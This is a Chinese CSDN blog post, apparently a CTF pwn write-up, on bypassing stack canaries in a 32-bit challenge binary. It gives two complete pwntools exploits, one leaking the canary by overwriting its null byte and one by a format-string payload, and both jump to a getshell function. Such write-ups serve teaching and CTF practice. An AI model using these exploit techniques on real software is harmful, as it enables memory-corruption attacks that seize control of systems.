Canary 的绕过方法

已于 2024-04-01 22:43:11 修改
阅读量1.6k 收藏 34
点赞数 42
文章标签: 网络 安全
于 2024-03-31 00:48:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuo1358/article/details/137185899
版权

题目下载

一、字符串截断获取canary

原理:

  • Canary设计其低字节为\x00,本意是阻止被read、write等函数直接将Canary读出来。通过栈溢出将低位的\x00覆写,就可以读出Canary的值。

二话不说,上题

6223550f8e3e4c60ae7082a12022b3ca.png

基础检查发现canary

丢入ida中

6f93bd166048427ba3796ec9a35e6b99.png

发现在循环printf,并且存在字符串漏洞(这个稍后再谈)

同时有getshell函数

5fff2e7654994c959a787379c631f431.png

可以直接拿shell

接下来就是找canary到栈顶的偏移

有两种方法,这里先介绍第一种

看汇编语言

跟进这段函数的汇编

d956f906af944a789bc7d78ba25202e5.png

发现 多了一段异或比较 

可以判断canary在var_c里,

5b1854f6dfb54f5ca15abc72a1837651.png

f7dba2417db64cdc9645919df209fb01.png

所以buf 到canary的偏移为0x70-0xc

payload1的构造为

payload1=b'a'*(0x70-0xc)

#注意 必须用sendline 发送 用\n来覆盖'\x00'

发送之后接受字符

canary=u32(io.recv(4))-0xa
#这里之所以要-0xa 是要去掉\n

最后构造payload2

payload2=b'a'*(0x70-0xc)+p32(canary)+b'a'*0xc+p32(getshell)

最终exp为

from pwn import *

context.binary = '1122'
#context.log_level = 'debug'
io = process('./1122')

get_shell = ELF("./1122").sym["getshell"]

io.recvuntil("Hello Hacker!\n")

# leak Canary
payload = b"A"*100
io.sendline(payload)

io.recvuntil("A"*100)
Canary = u32(io.recv(4))-0xa
log.info("Canary:"+hex(Canary))

# Bypass Canary
payload = b"a"*100+p32(Canary)+b"a"*12+p32(get_shell)
io.send(payload)

io.recv()

io.interactive()

最后强调一下

context.binary = '1122'
#context.log_level = 'debug'

这两行必须要有一个,否则无法运行

最后运行得到shell

ca95917ac9e1484f9a56feced23da1f2.png二、字符串漏洞泄露canary

原理

  • 格式化字符串漏洞可以打印出栈中的内容,因此利用此漏洞可以打印出canary的值,从而进行栈溢出

还是上面那道题

这次来介绍一下另一种寻找偏移的办法

用gdb 调试

先用gdb在printf处下断点

 069eedb8baaf434d8bf7fd0ab21cd043.png

找到第一个printf下的栈帧0xffffcf98

f7ae2cdad1db4aa1b71ce47469ed8fd4.png

从ida上知道程序主要在vuln 函数里面

用gdb 运行文件并在函数下断点运行

941cd70ce30a4bfcb829b9ff7f297d71.png

7487d0485f5344ddafb8aea6481704cf.png

发现有一段异或比较,可以判断canary 的值就在eax里面

不断步入到0x8049256

9c1dc74116fb40bca8a1cb7166632c72.png

记住eax的值

查看前50的栈帧

74f6a425289f4a8cad1acfb4f159c845.png

发现canary存在地址0xc中

可以计算偏移

2a986d1cd1b44f7bb9f2273a28bd9f5b.png

继续点n

到read 函数运行(这一步很重要,否则偏移不准确)

10a259f6189942188c17b19f0159cea2.png

再次查看栈帧计算此时canary 到esp的偏移量

4bd86eacf67a4be4a83da8827b9c527f.png

因为程序是32位

4个字节一组就是31组

所以canary的偏移为31

这部分可参考

https://www.freebuf.com/articles/system/233515.html

https://blog.csdn.net/glhdbk/article/details/100595050

则payload1可构造

payload_1 = b'%x-' * ( 6 + 25)
conn.send(payload_1)
recvbytes = conn.recv()

# 获取canary
canary = int(recvbytes.split(b'-')[-2], 16)

泄露出canary的值

最后进行再一次栈溢出

payload_2 = b'a' * (0x70 - 0xc) + p32(canary) + b'a'*0xc+ p32(getshell)

最终exp

from pwn import *
context.log_level = 'debug'
#context.log_level = 'debug'


conn = process('./1122')

getshell = 0x080491b6
conn.recvuntil('Hello Hacker!\n')

# 第一次溢出
payload_1 = b'%x-' * ( 6 + 25)
conn.send(payload_1)
recvbytes = conn.recv()

# 获取canary
canary = int(recvbytes.split(b'-')[-2], 16)
print(f'Canary: {hex(canary)}')
# 第二次溢出
payload_2 = b'a' * (0x70 - 0xc) + p32(canary) + b'a'*0xc+ p32(getshell)
conn.send(payload_2)
conn.recv()
conn.interactive()

笔者纯小白 有错误希望指出

canary爆破、pie保护(格式化字符串漏洞)
2301_81031055的博客
01-29 480
canary两种解题方式:1.爆破canary2.如果存在字符串格式化漏洞可以输出泄露canary的地址并利用栈溢出覆盖canary的地址返回到system地址从而达到绕过
stack canary绕过思路
sea_time的博客
11-29 2002
canary 简介: 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,...
Canary以及Canary绕过技巧
Sakura给爷pwn全场
12-11 373
canary介绍与绕过技巧: https://blog.csdn.net/weixin_43713800/article/details/105273284
Canary,三种优雅姿势绕过
最新发布
yjh_fnu_ltn的博客
07-06 998
如果利用栈溢出将最低位的b’\x00’覆盖,就可以利用答应函数将canary一致输出,最后再在最低位拼接上。逐次覆盖掉canary的4个字节(一位无法绕过低位字节堆高位进行爆破,所以必须从低到高),且要求canary不能变化,绕过重开程序canary变化,就不适用爆破了。在进行栈溢出时,如果程序开启了canary保护,首先就需要泄漏这个随机值,否则其被覆盖掉后,程序在退出时再检查该值,会引发错误。注意:canary爆破时,利用栈溢出,溢出到canary位置,从。首先确定要覆盖的位置,由于是。
Canary机制的绕过
weixin_30822451的博客
04-22 330
目标程序下载 提取码:8ypi 1.检查程序开启了哪些安全保护机制 Canary与NX开启了 Canary机制简介 64位的canary机制,会在函数头部添加: mov rax,QWORD PTR fs:0x28 //从fs:0x28寄存器中取一个值 mov QWORD PTR [rbp-0x8],rax //写入当...
【八芒星计划】绕过canary
carol2358的博客
09-02 701
文章目录wdb2018_guess wdb2018_guess 有趣的题目,本题fork了三次,那么就会gets三次 利用三次gets和canary,我们可利用stack smash来获得三次信息 第一次获得libc,第二次获得栈地址,第三次获得flag 覆盖argv[0],也就是程序名所在的位置 先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是stack_end,位置是utf8的位置 然后第二次输入通过environ来获得stack的地址 第三次就可以
绕过canary原理及其利用方式
glhdbk的博客
09-07 4355
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
01-27
一旦Canary值泄露,攻击者就可以绕过Canary保护,构造特定的payload来控制程序执行。 此外,实验还提到了使用Python脚本`exp.py`进行exploit,这可能涉及到ret2libc技术,这是一种经典的栈溢出利用方法,通过跳转到...
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 3096
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
canary介绍与绕过技巧
0pt1mus
04-02 7384
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当...
【pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 6749
Canary各种绕过姿势
【PWN学习】cannary绕过方式汇总
weixin_41748164的博客
12-23 915
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
ex2(canary绕过
qq_51687381的博客
05-25 513
先上IDA看一波反汇编
Canary保护机制及绕过
二狗的博客
01-29 977
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Canary机制及绕过策略
helloworlddm的博客
06-14 3476
Canary机制 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段(只是缓解机制,不能彻底的阻止),当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode
canary机制及绕过策略
qq_44119514的博客
08-20 358
[pwn]ROP:三道题讲解花式绕过Canary栈保护
热门推荐
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
pwn-canary绕过和PIE(未完待续)
m0_75234353的博客
05-30 1070
看见了fork函数,那就通过爆破得出canary对于 Canary,但是同一个进程中的不同线程的 Canary 是相同的,并且通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 打开sub_128A函数 明显的溢出发现后门函数 开始计算溢出大小0x70-0x80=104①先逐字爆破出canary的值②直接溢出到返回地址,覆盖为后门函数的地址。但这道题开了PIE保护,而PIE是代码段,数据段
利用格式化字符串漏洞泄露Canary机制及其绕过策略
文章接着介绍了利用格式化字符串漏洞泄露Canary值的方法。由于Canary的值每次运行都会改变,攻击者可以通过覆盖栈帧中的数据来尝试猜测或直接获取。具体操作是在printf函数的格式化字符串漏洞点下断点,输入特定的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值